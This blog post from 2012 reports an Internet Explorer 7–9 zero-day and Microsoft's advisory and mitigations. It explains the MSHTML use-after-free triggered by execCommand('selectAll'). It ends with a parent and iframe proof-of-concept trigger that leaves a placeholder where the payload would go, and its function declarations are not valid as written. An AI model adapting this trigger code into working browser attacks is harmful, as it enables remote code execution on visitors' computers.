Posted on Leave a comment

Attackers have begun exploiting new Zero-Day Internet Explorer vulnerability (UPDATE)

According to ComputerWorld, attackers have begun exploiting a new zero-day vulnerability in Microsoft’s Internet Explorer web browser.  The vulnerability allows hackers to hijack Windows PCs that browse to malicious or compromised websites.  The bug can be exploited in IE 7, IE 8, IE 9 (but not IE 10) allowing access to Windows XP, Vista, and Windows 7 based computers.  Windows 8 computers are unaffected. Computerworld explained that the exploit was discovered by a Metasploit tool contributing programmer.

“Frequent Metasploit contributor Eric Romang stumbled upon the IE exploit when he probed one of the servers he claimed was operated by the “Nitro” hacker gang, which used a zero-day in Oracle’s Java to compromise PCs last month.”

I will update this page as new details are discovered. UPDATE (9/18/12): Microsoft issued a security advisory confirming the in-the-wild exploit.  They are working on a fix.  The bug will be rated “critical”, their highest threat ranking.

“Until a patch is available, Microsoft recommended that users block attacks with EMET 3.0 (Exploit Mitigation Experience Toolkit), boosting IE’s security zone settings to “high,” and configuring the browser to display a warning before executing scripts.”

 

How the hack works

The exploit is possible due to an unpatched bug in the MSHTML component of Internet Explorer.  The MSHTML component is a part of the browser stack and is responsible for parsing HTML and CSS and rendering.

The attack is a remote code execution vulnerability that relates to the manner in which IE allocates and releases memory after the JavaScript document.execCommand(“selectAll”)  function is used (possibly only when used within an <iframe>) to select all text on the page when the page first loads.  The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer.

The exploit code adds a onSelect() handler too, that will trigger when the execCommand(“selectAll”) fires.  This onSelect() handler contains exploit code to execute when the execCommand(“selectAll”) is fired on page load.  The exploit code begins with a document.write(“X”) statement.  Apparently this statement causes Internet Explorer to drop the memory that was allocated to an array.  This memory can then be overwritten with anything the hacker wishes to use.

The exploit in the wild has additional code to obfuscate the exploit code.

Sample hack and exploit code below:

Contents of parent page

Begin by allocating memory for an array.

<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement(“img”);
arrr[0][“src”] = “L”;
</script>
<iframe src=”child.html”>
</body>

 Contents of <iframe> page

On page load, fire function to select all text.  Add onSelect() handler to overwrite memory when all the text is programmatically selected.

<html>
<script>
funcSelectAll() {
document.execCommand(“selectAll”);
};

funcOverwriteMemory() {
document.write(“L”);
parent.arrr[0].src=”EXPLOIT CODE HERE”;
}
</script>

<body onload=’funcSelectAll();’ onselect=’funcOverwriteMemory()’>

<div contenteditable=’true’>
X
</div>
</body>
</html>

Sources: ComputerWorld